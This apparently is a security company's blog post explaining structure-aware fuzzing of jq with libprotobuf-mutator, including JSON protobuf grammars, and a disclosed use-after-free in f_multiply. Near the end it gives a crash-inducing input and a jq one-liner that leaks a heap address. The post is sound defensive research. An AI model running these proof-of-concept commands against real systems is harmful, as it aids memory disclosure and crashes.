ForAllSecure Blog

Learning About Structure-Aware Fuzzing and Finding JSON Bugs to Boot

Harrison Green
August 26, 2020


What do JSON, YAML, and HTTP have in common? They’re all examples of ubiquitous data serialization and transmission standards, making them great targets for testing with fuzzing. While fuzzing has found many bugs in these kinds of targets, they all have requirements for structure in order for data to be considered “valid.” Handling these structure requirements intelligently is the key to finding the next level of bugs that others may have missed!

During my internship at ForAllSecure I had the chance to experiment with structure-aware fuzzing. This type of fuzzing is very exciting because it can efficiently explore targets that take complex, structured input such as JSON, XML, HTML, YAML, or even more complex structures such as PNG images

I explored this concept by fuzzing JQ, a very popular JSON parsing library written in C. In fact, as of this writing it has 17,246 stars, making it the 19th most starred github repository written in C! Using a structure-aware fuzzer in Mayhem I was able to find several bugs (including a potentially remotely-exploitable use-after-free) that a simpler coverage-guided fuzzer could not find.

This post will describe when structure-aware fuzzing is useful, how to build a structure-aware fuzzer, and how I found a bug in my first week of fuzzing using this technique (which we disclosed to the maintainers on 14 February 2020).


  1. What is structure-aware fuzzing and what does it do better?
  2. How to build a structure-aware fuzzer with libprotobuf-mutator
  3. How I discovered a use-after-free (UAF) in JQ
  4. Details of the JQ UAF in f_multiply()


Part 1: What is structure-aware fuzzing and what does it do better?

With normal coverage-guided fuzzing like we see with AFL and Libfuzzer, we capture information about how the target responds to our input (such as edge coverage, instruction counting, etc.). This feedback from the target enables coverage-guided fuzzers to guide their search to discover inputs that reach new parts of the program. The intuition here is that by slightly modifying, or “mutating” in fuzzer terminology, the data in our input, we might take a similar execution path in the target binary. So if we find an interesting new input, we can mutate it to explore the execution space around it. 

This is usually a very effective technique, and it is excellent at finding bugs in data parsers, but in certain scenarios it may not be very efficient. If your target has high requirements for validity or if you are trying to find deep bugs in how valid inputs are processed, standard mutation strategies (such as flipping bits) will spend most of the time generating invalid inputs which aren’t useful. Structure-aware fuzzing is when we build these requirements into the fuzzer, assuring that the generated inputs meet them. To give the idea with a non-code example:

If we compare fuzzing to playing the classic game “Battleship,” a “dumb” fuzzer is like calling shots without knowing if our previous shots were “hits” or “misses”. Its strategy is just to shoot around blindly. With coverage-guided fuzzing, on the other hand, we know if our previous shots were “hits” or “misses” and once we get a “hit” we know to look at nearby tiles for the rest of the ship. 

Now if we think about how we provide input in a game of Battleship, we know that all of our inputs (shots) have to be in the format of a letter followed by a number, such as “A1” or “C6”. Since only the board only has 10 rows and columns, the letters must be between A and J and the number from 1 to 10. A structure-aware fuzzer would know to only specify inputs using one of those letters, followed by one of those numbers, while a normal coverage-guided fuzzer would mutate inputs into potentially invalid strings such as “AAAA”, “99B”, or “!@#$”. If you immediately lost the game every time your fuzzer specified a shot that didn’t follow the rules, a coverage-guided fuzzer would rack up a lot of potentially needless losses.

So how do we know when to use structure-aware fuzzing and what does it look like? Typically fuzzing is fairly simple when we have a target function that accepts raw bytes like:

void fuzz_me(char *data)

But sometimes we have a more complex signature such as: 

void fuzz_something(char *s, int a, int b, int c)

Or perhaps, we have a function that accepts raw bytes, but internally it expects well-formatted data such as in the case below. If there are reasonable structure checks such as internal data references, lengths, or checksums, we will spend a lot of time getting caught in the valid_image function and it will be hard to explore the state space of process_image.

void fuzz_image(char *img_data) {
    if (valid_image(img_data)) process_image(img_data);

Structure-aware fuzzing can help in both situations. The idea is to constrain our input space to semantically or structurally valid data. When we do this, we can fuzz functions that expect structured data.

Writing a basic structure-aware fuzzer just requires that we can generate random inputs of a certain type. For example, if we want to fuzz a function like the previously-mentioned fuzz_something(char *s, int a, int b, int c) we’d want something like the following pseudocode:

void fuzzer(input) {
    const char *s = input.get_string();
    int a = input.get_int();
    int b = input.get_int();
    int c = input.get_int();


But how do we implement the get_string() and get_int() functions and take advantage of coverage-guided fuzzing? A common approach is to treat the input as a random byte stream that the fuzzer will populate and pull values out of the stream. This kind of approach is fairly easy to set up using existing libraries and works well for simple examples like above. However, as we start dealing with more complex data structures, the standard mutations in coverage-guided fuzzers become less useful and more destructive.

Why is this? Essentially, we are deserializing the input stream from a specific format. For example, the data might be packed like so:


Notice how we are very unlikely to generate a mutation that will change the length of string s while preserving the values of a, b, and c. As soon as we change how that one element of the input is parsed, we might affect how everything after it is parsed. If our target does something like the following:

void fuzz_something(const char *s, int a, int b, int c) {
    if (a == 0xdeadbeef && b == 0x11111111 && c == 0x22222222) {
        if (strlen(s) == 100) __builtin_trap();

Coverage guided-fuzzing will allow us to quickly satisfy the first if-condition and find the correct values for a, b, and c. However, as soon as we change the length of string s, we will change the input stream values that follow the string and need to repeat our work to find values for a, b, and c. A structure-aware approach would be to appropriately adjust s_length any time we add or remove bytes to s_data and keep the length the same if we’re only modifying the contents. This is perhaps a contrived example but hopefully it serves to demonstrate why this type of structure-aware fuzzing becomes more efficient for more complex structure types.

So to fuzz some targets efficiently we need not only well-structured inputs but also structure-aware mutations. This is where libprotobuf-mutator can help us.

Part 2: How to build a structure-aware fuzzer with libprotobuf-mutator

Libprotobuf-mutator (or LPM) is a library to randomly mutate protocol buffers. It can be combined with libFuzzer to create a structure-aware, coverage-guided fuzzer. As the name suggests, LPM mutates Protocol buffers (aka protobufs). 

Protobufs are a platform-neutral serialization format that can be used to serialize structured data types. In this language, an object is called a message. These messages can have simple types like int or float or they contain other messages (even recursively). 

The key idea in LPM is that our fuzzer input is no longer a raw byte sequence, instead it is an instance of a protobuf object. Instead of deserializing a raw byte stream, we are simply reading a protobuf object. The primary benefit of using LPM in a fuzzer is that the fuzzer can mutate the protobuf object directly (via changing values and adding or removing messages) in order to preserve the overall structure. In this way, our fuzzer respects the high-level structure of our data and can mutate components independently.

So to harness our previous example, we can define a simple protobuf object like the following:

syntax = "proto3";

message MyInput {
    string s = 1;
    int32 a = 2;
    int32 b = 3;
    int32 c = 4;

Then we can use the libprotobuf DEFINE_PROTO_FUZZER macro to setup a libfuzzer entrypoint and consume our protobuf object:

DEFINE_PROTO_FUZZER(const MyInput& input) {
    const char *s = input.s().c_str();
    int a = input.a();
    int b = input.b();
    int c = input.c();


In practice this type of bug is found within a few seconds of running the harness. In addition, since we compile this harness into a standard Libfuzzer executable, we can run it inside of Mayhem to take advantage of scaling, corpus management, and crash deduplication.

Now let’s examine structure-aware fuzzing on a more complex target.

Part 3: How I discovered a UAF in JQ

JQ is the project that builds the command line tool for JSON processing named jq. The tool takes JSON input and allows you to define “filters” that operate on the data. These filters are typically short programs, but they can become complex by stringing filters together (as in sed or awk).

From a high level view, a good entrypoint to fuzz is essentially the main function, where the code processes a JSON string and a filter string from the command line. This is pretty easy to fuzz, since it just takes two strings. However, after some inspection of the code we see that both strings are first validated. Essentially the code does something like:

void jq_main(const char *json, const char *filter) {
    jv input = jv_parse(json);
    if (!jv_is_valid(input)) exit(-1);
    jq_state *jq = jq_init();
    if (!jq_compile(jq, filter)) exit(-1);

    jq_start(jq, input, 1);

If we pass improperly structured data, we will never reach the interesting part of execution which happens after jq_start.

Note: if we are actually interested in fuzzing jv_parse or jq_compile, it would very much make sense to use raw byte coverage-guided fuzzers on these functions. However, for this demo, we are trying to uncover bugs that occur during the execution of these filters.

To fuzz this kind of target, we can define a grammar for JSON and JQ filters as a protobuf spec and then write a conversion function to build a well-structured string for each input. For example, our fuzz harness would look like this:

DEFINE_PROTO_FUZZER(const MyInput& input) {
    const JSON_value json = input.json();
    const JQ_program filter = input.filter();

    const char *json_string = JSON_to_string(json);
    const char *filter_string = JQ_to_string(filter);

    jq_main(json_string, filter_string);

Note: since the libprotobuf mutator macro expects a single protobuf object as input, we can just define an input message that contains a JSON object and a JQ filter object like so:

message JQ_both {
    JSON_value json = 1;
    JQ_program filter = 2;

	Our JSON grammar looks like:

syntax = "proto3";

message JSON_value {
    oneof value {
        JSON_object obj = 1;
        JSON_array arr = 2;
        JSON_number num = 3;
        JSON_true true = 4;
        JSON_false false = 5;
        JSON_null null = 6;
        string str = 7;

message JSON_object {
    repeated JSON_key_value_pair entries = 1;

message JSON_key_value_pair {
    string key = 1;
    JSON_value value = 2;

message JSON_array {
    repeated JSON_array_item items = 1;

message JSON_array_item {
    JSON_value value = 1;

message JSON_number {
    oneof value {
        int64 long = 1;
        double double = 2;

message JSON_true {}
message JSON_false {}
message JSON_null {}

The goal here is not to explicitly match a formal definition of JSON. Instead we just need to define a grammar that can generate a variety of inputs that will all be accepted by a JSON parser.

In order to use this in our harness, we also need to define a function to convert the type from by our protobuf spec (JSON_value) to a string, the type our target expects. Due to the recursive nature of how we defined our protobuf format, I found it useful to define a utility class JSONWriter that recursively constructs a string when it is initialized. Then the conversion function (which we creatively called JSON_value_to_string()) just has to construct the object and get the output string from the writer object. Here is a snippet from the implementation:

std::string JSON_value_to_string(const JSON_value &json_value) {
    JSONWriter writer(json_value);
    return writer.to_string();

class JSONWriter {
        JSONWriter(const JSON_value &json_value);
        std::string to_string();

        void _write_JSON_value(const JSON_value &json_value);
        void _write_JSON_object(const JSON_object &obj);
        void _write_JSON_array(const JSON_array &arr);
        void _write_JSON_number(const JSON_number &num);
        void _write_string(const std::string s);

        std::ostringstream _out;


JSONWriter::JSONWriter(const JSON_value &json_value) {

void JSONWriter::_write_JSON_value(const JSON_value &json_value) {
    switch (json_value.value_case()) {
        case JSON_value::kObj :
        case JSON_value::kArr :
        case JSON_value::kNum :
        case JSON_value::kTrue :
            _out << "true";
        case JSON_value::kFalse :
            _out << "false";
        case JSON_value::kNull :
            _out << "null";
        case JSON_value::kStr :

std::string JSONWriter::to_string() {
    return _out.str();

In order to visualize what we’re generating, we can define a separate standalone fuzzer that just takes a JSON_value, unpacks it, and prints out the corresponding string.

DEFINE_PROTO_FUZZER(const JSON_value& val) {
    std::string str = JSON_to_string(val);
    std::cout << str << std::endl;

Here are some examples of generated inputs from when I first put this together:

{"": [2.52962e-321]}
{"": []}
["", [{"": []}, "", , []], []]
["", [{"": true}, "", , []], []]
["", [{"": true}, "", , null], []]
["", [{"": true}, "", , ""], []]
["", [{"": ""}, "", , ""], []]
{"": "", "": ""}
{"": "", "": "", "": ""}
{"": "", "": "", "": 0}
{"": "", "": "", "": 0, ")": ""}
{"": "", "": [""]}
{"": [{"": [{"": [{"": [false]}]}, false]}]}
{"": [{"": [{"": [{"": [9.7347e-309, false]}]}, false]}]}
{"": [{"": [{"": [""]}, false]}]}

I went through a very similar process to define a grammar for JQ filters (which is a bit too big to embed in this blog post) and it generated filters like the following:


There are a few more relevant details to using LPM efficiently (especially related to protobuf default values), but we don’t have space to cover them here. You can refer to our Github repository to see a stripped-down version of the fuzzer that quickly reproduces one of the bugs I found in JQ.

Part 4: JQ UAF in f_multiply()

Using the protobuf specifications from the previous section, I was able to build a structure-aware coverage-guided fuzzer to explore the behavior of JQ. I ran the fuzzer inside of Mayhem and quickly found some crashing test cases. Specifically, I found several (uninteresting) ways to crash the program with assertion errors as well as a more interesting use-after-free bug.

In JQ there is the concept of string multiplication, where something like “abc” * 3 should produce “abcabcabc”. One of the crashing test cases included a string that was being multiplied by some large number. I was able reproduce a smaller test case such as the following:

$ echo -ne "\"abcd\"" | jq '. * 3'

This produces the correct result (“abcdabcdabcd”) however, if we run this on a version of jq compiled with AddressSanitizer, we get the following trace:

==54==ERROR: AddressSanitizer: heap-use-after-free on address 0x60300000e570 at pc 0x0000005cd728 bp 0x7ffcd28a6e40 sp 0x7ffcd28a6e38
READ of size 1 at 0x60300000e570 thread T0
    #0 0x5cd727 in jvp_utf8_next /src/jq-asan/src/jv_unicode.c:35:40
    #1 0x5cdc73 in jvp_utf8_is_valid /src/jq-asan/src/jv_unicode.c:79:16
    #2 0x568c76 in jv_string_append_buf /src/jq-asan/src/jv.c:1140:7
    #3 0x675cf7 in f_multiply /src/jq-asan/src/builtin.c:328:13
    #4 0x533f09 in jq_next /src/jq-asan/src/execute.c:858:21
    #5 0x51fab0 in process /src/jq-asan/src/main.c:180:31
    #6 0x51dc95 in main /src/jq-asan/src/main.c:677:15
    #7 0x7f26e1246b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #8 0x41b599 in _start (/usr/asan/bin/jq+0x41b599)

After some digging, I found the relevant code in f_multiply in builtin.c:

int n;
size_t alen = jv_string_length_bytes(jv_copy(str));
jv res = str;

for (n = jv_number_value(num) - 1; n > 0; n--)
  res = jv_string_append_buf(res, jv_string_value(str), alen);

Here num is set to 3 and str is our original template string “abcd”. The for loop simply iterates n-1 times and appends our template string to res which is saved as the result. 

The bug is that jv_string_append_buf may free and reallocate the string buffer if it runs out of space to append characters. Normally this wouldn’t be a problem. However in this case res is simply a shallow copy of the template string: (jv res = str). The template string ends up being freed in the second iteration of the loop yet we keep reading from it in subsequent iterations, hence “use after free”.

If we use a large enough string we can embed corrupted data into the resulting string which causes jq to crash when it tries to print invalid utf-8 characters:

python -c "print('\"' + 'a'*1100 + '\"')" | jq '.*5'

Alternatively, if we have more control over the filter, we can extract and leak a heap address (which reveals information about the internal address space of the program) with this nifty one-liner:

jq -n -c '"a"*2000 | .*7 | explode | .[8000:8008] | reverse | map(if (.<0) then (.+256) else (.) end) | map((./16|floor), .%16) | map(["0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f"][.]) | join("")'

Hopefully we’ve reinforced that fuzzing is an effective way to discover vulnerabilities or unintended behaviours in software, and with some creativity and application of techniques we can test code that otherwise would be unproductive to fuzz. We gave a brief intro to structure-aware fuzzing and demonstrated how to build your own structure-aware fuzzer with libprotobuf-mutator, with an example against a real-world target. If you’re interested in playing around with the code or reproducing the UAF bug, you can check out our open-source Vulnerability Labs repository.

As I hope this post demonstrated, structure-aware fuzzing is a very powerful technique to find vulnerabilities in targets with structured data. While this post demonstrated how to work with JSON data, the same ideas can be applied to any other target with requirements for well-formed data in order to find deep bugs that others might miss.

This isn’t to say that you shouldn’t try to find low-hanging fruit with coverage-guided fuzzing. Mayhem allows users to run multiple fuzzers simultaneously while sharing a corpus and take advantage of the strengths of each. For example, you could pair the efficiency of a structure-aware fuzzer with the unlimited exploration of a standard coverage guided fuzzer or the analytical power of symbolic execution. If you’re interested to learn how to integrate these techniques in testing your code, check us out at Know you’re ready for Mayhem? You can speak to one of our security experts at

Stay Connected

Subscribe to Updates